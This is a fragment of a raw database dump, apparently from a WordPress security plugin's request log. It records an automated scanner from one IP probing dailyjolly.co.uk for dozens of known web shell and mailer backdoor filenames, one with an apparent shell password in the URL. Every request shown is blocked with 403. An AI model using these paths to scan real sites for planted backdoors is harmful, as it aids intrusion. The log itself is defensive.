\\/wp-includes\\/\\/system.php\"}','Jv3i96fLzo2ywScAk8rYFCt4',0,1674344625.5250,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/tax2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/tax2.php\"}','Z8FSoGfMn2HV0yKQlxhw5Yit',0,1674344625.8328,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/trio-kece.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/trio-kece.php\"}','lYRAZv7q6Baj3Ufcd5HL28mh',0,1674344626.1670,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uplaod.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uplaod.php\"}','4TgvdHFtkzlx0NG8ifjb7DB3',0,1674344626.5242,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uploadzip.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uploadzip.php\"}','LPNRkSVAECuv0lyp2jbJZh9s',0,1674344626.8594,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/user-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/user-cron.php\"}','GRWngcolzr4Kxd1bwBJkEt9V',0,1674344627.1927,201,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/users.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/users.php.suspected\"}','sFpwBWxC0RzJ2hKHgAbfucvO',0,1674344627.5520,216,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/vjgtd8LW.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/vjgtd8LW.php\"}','sWUAwvyEYac9efPq26LO5VIM',0,1674344627.9310,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-2019.php\"}','gUcwvOsSGHEWTC9I0NFDdyqf',0,1674344628.2805,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-class.php\"}','mIO9y8Uci3sBkr4tMHzAgVfw',0,1674344628.6420,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-gypqic.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-gypqic.php\"}','RpPg73J0Dy8jEemYLosIkiOM',0,1674344628.9755,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-includes\\/admin-bar.php\"}','QZCkNd1wRs0LJvgEPK92Vt3r',0,1674344629.3817,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-log.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-log.php\"}','53wdHGgtehklnvLsF289BU7y',0,1674344629.7480,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-logs.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-logs.php\"}','K7CauedYSGitwyIUrcZJgjTD',0,1674344630.0807,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-mail.php\"}','vIPYnOKVNBC39A12eMGb0mhx',0,1674344630.4045,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-type.php\"}','YOxbtrnuo0QMvyIUcaCjq5VE',0,1674344630.7671,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wpspl-load-compat.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wpspl-load-compat.php\"}','ftvPB18nNpxikdb4hY5m37VH',0,1674344631.1725,244,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wsoyanzorng.php\"}','CcwTfiHze63qvglYI0rd2AaX',0,1674344631.5802,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/assets/alfa4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/assets\\/alfa4.php\"}','RjeWN4MEuGy7L0qoK6vdVHmT',0,1674344631.9666,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-supports/layout-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/block-supports\\/layout-ajax-response.php\"}','A358KhXDbn1EHeUCvc9JQZPI',0,1674344632.6109,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/comments-popup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/comments-popup.php\"}','w6aFq7RhzWgsif4QyUmu9kIv',0,1674344632.9492,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/image_type_to_mime_type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/image_type_to_mime_type.php\"}','axnCicpHFB29ltT1YZXP5mD8',0,1674344633.2779,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/submenu-pspell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/submenu-pspell.php\"}','ySQeb9V7KXiEJO8srzFpHPdM',0,1674344633.5886,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/wp-conflg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/wp-conflg.php\"}','9wH4I2Z05lak3BmegJyRjVuc',0,1674344633.9034,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/wp-signup.php\"}','2giSGqHTfDd63mMjIwZzLenC',0,1674344634.2460,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/01%20copy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/01%20copy.php\"}','4HDFyMsY9Z7LPTtW28gGaRhS',0,1674344634.5997,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/01589a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/01589a.php\"}','k59tDXzvKqFUeyV8JLZi0gAj',0,1674344634.9352,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/88981.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/88981.php\"}','4FGIBelMwYrhyTiXKVNCDEfP',0,1674344635.2689,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/bimowdoodk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/bimowdoodk.php\"}','rCzVtybFSOHWKsewxj6J2vlm',0,1674344635.6461,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/css-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/css-blog.php\"}','HqlJD872jnVaus5NKkUSxyzT',0,1674344635.9766,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/mpv2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/mpv2.php\"}','TYg1e4tAwfZkr50Cj2xMzIn3',0,1674344636.3020,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/str_replace.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/str_replace.php\"}','ytSlX56RE8WazUIdJwxPKTgL',0,1674344636.6373,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/elbjewpi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/elbjewpi.php\"}','ATm6p5JNq7ZUtRnzBFXOG0f9',0,1674344636.9606,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/inpf8747384.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/inpf8747384.php\"}','1CJMj4t6l3k0hcSmzNRrafFp',0,1674344637.2732,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/fonts/setcookie.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/fonts\\/setcookie.php\"}','r8GlyX9BdgSEVW7IzLZ2umxp',0,1674344637.5962,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/fonts/sqlite_pagebreak_adapter.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/fonts\\/sqlite_pagebreak_adapter.php\"}','U6C1VmWhQJAnTGaqlupXBw5L',0,1674344637.9161,203,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/l.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/l.php\"}','f2QAiDU7wdvBlkbaHsWoLNh8',0,1674344638.2684,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/license.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/license.php\"}','6ONTLtBk4XcZzAKW0gQi9GbC',0,1674344638.5818,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/module.audio-video.riff-wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/module.audio-video.riff-wp.php\"}','7y1KHJ9q6e4nASIzcsXTv8Z0',0,1674344638.9194,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/tablepress_controllers.php\"}','MTZe7ord2sHShYf61KI5ENxj',0,1674344639.2655,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/unzipper.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/unzipper.php\"}','qfa8ySK5YsVZ4igeGpO1RPwF',0,1674344639.6019,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/vp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/vp.php\"}','g1WNo0LAwO2InQKFHvSTpuUe',0,1674344639.9297,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ID3/wp-plugins.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/ID3\\/wp-plugins.php\"}','o3w7IYr0GH4W6ke1sfCM8qjJ',0,1674344640.2492,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/acces.php\"}','EX1tFrndZjqIM8xGBW9TlKRy',0,1674344640.5807,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/configure.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/configure.php\"}','Sq4iRoPz9OMxm7Q2TLYl1fDG',0,1674344640.9114,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/images/img911.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/images\\/img911.php\"}','KX7V6QkWHOAEvzb3NUrYlx8a',0,1674344641.2331,205,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/IXR/opt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/IXR\\/opt.php\"}','CJS0sUrmo5fy4KM3AlHice1F',0,1674344641.6073,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/IXR/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/IXR\\/tablepress_controllers.php\"}','yGlmA3u0cHEhSVwBrqMWTjI1',0,1674344641.9442,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/auto.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/auto.php\"}','0l6sbALaYeNKzGF8JDqMwHIj',0,1674344642.2615,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/old.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/old.php\"}','xz6RX5nPwLAVB9vKr3uG0bOF',0,1674344642.5992,224,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/system.php\"}','OiIVLXfRZcvWb09kj7tBxy1d',0,1674344642.9798,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/247@abu.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/247@abu.php\"}','M8jrt9oWqIfcQepi4nNBFvR2',0,1674344643.3061,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/bak.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/bak.php\"}','k7Y6TDMS4Cl5BOFA312uEKaN',0,1674344643.6251,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','ofnNaczT6QFlpWjB0ShuUw1I',0,1674344643.9550,205,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/Oilmoney.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/Oilmoney.php\"}','pbZ2IQg0CvNe1rXi7FMcw9Jh',0,1674344644.3179,259,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/tablepress_controllers.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/tablepress_controllers.php\"}','q1QmVUF8BAvogp9dcN3LKXH5',0,1674344644.7505,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/treame.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/treame.php\"}','Ezhv6rq9kCt2NKMsRadcY7PA',0,1674344645.0867,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/user-new.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/user-new.php\"}','0qQTHV9LOc3Eihuk5ybAstoJ',0,1674344645.4060,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/wp-y4y54.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/wp-y4y54.php\"}','mRu0MAFdz3xfjswN4Wy5TItL',0,1674344645.7293,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/yellow.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/yellow.php\"}','1aXmz4HVWeLdnhQ0ry2BcEPg',0,1674344646.0573,210,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/zlib.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/zlib.php\"}','2trsORIKfhHF0UmvwNnqgeXy',0,1674344646.4203,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/random_compat/random_bytes_cyclone.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/random_compat\\/random_bytes_cyclone.php\"}','9cLvu3xnTAJSIKjXlhZNHPEF',0,1674344646.7654,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/SimplePie/acces.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/SimplePie\\/acces.php\"}','P9sXTHZyK0MJoilBdgexwDrq',0,1674344647.1010,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/back-up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/back-up.php\"}','YkZAFHxa8OwWu7qBg2T5ymcD',0,1674344647.4235,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/border.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/border.php\"}','eaXfFBPkLYxwoV12nKbcJpyM',0,1674344647.8282,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-compat/ok.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/theme-compat\\/ok.php\"}','u1JykhtdqNRf5TDnWxmwIOFp',0,1674344648.1861,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/leafmailer2.8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/leafmailer2.8.php\"}','JLnPCt5FOUwX2p7ZayeGYRrV',0,1674344648.5219,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/mail.php\"}','sBIDqeQlzMHdkL8u6vY1TrEA',0,1674344648.8540,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/x3dleaf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/x3dleaf.php\"}','QXzfnRFJYIhakEZH8qUesWD5',0,1674344649.1960,214,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/mailer.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/mailer.php\"}','dqA9HIVOUp8wjvb7RZofJEsx',0,1674344649.5592,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/js.php/.well-known/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/js.php\\/.well-known\\/\\/mail.php\"}','GulQXHcnaPR6KfCxbZIyr0pY',0,1674344649.8916,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/dze.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/dze.php\"}','rTSKvCFyqpdjNoJ0G9kuAYfc',0,1674344650.2464,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/%20.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/%20.php\"}','dWPNUzox4R8mFZcwlC5gTrpX',0,1674344650.5625,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/dx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/dx.php\"}','lhzr1MHj8ckJbg046dZIFKnY',0,1674344650.8822,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/utchiha505.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/utchiha505.php\"}','to0sfROmnyGWFUNp1KQgSrVu',0,1674344651.2254,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/01.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/01.php\"}','PORFnfUckr8X3ue9QWIm2w1z',0,1674344651.5492,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/02.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/02.php\"}','m6yIYnkFfjZNWC58oU7G9Qiz',0,1674344651.8684,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/0z.php\"}','7rZvdhi6PyU5NfWgk0mwROIz',0,1674344652.2115,216,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1.php\"}','gv3OLG5SUY6VCz2XDajW9xiw',0,1674344652.5971,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1337.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1337.php\"}','iMxoBpGLvOlHySEVwdIAk6Rr',0,1674344652.9279,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1h6j5.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1h6j5.php\"}','P2HmedJ9U6pGwX7RbxlTovuM',0,1674344653.2552,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1index.php\"}','zsOc6TefqodgWH91tlPCmaLX',0,1674344653.5984,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','fXZKjuvQ4nPdEwtao9xWmSUe',0,1674344653.9317,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/2index.php','','{\"1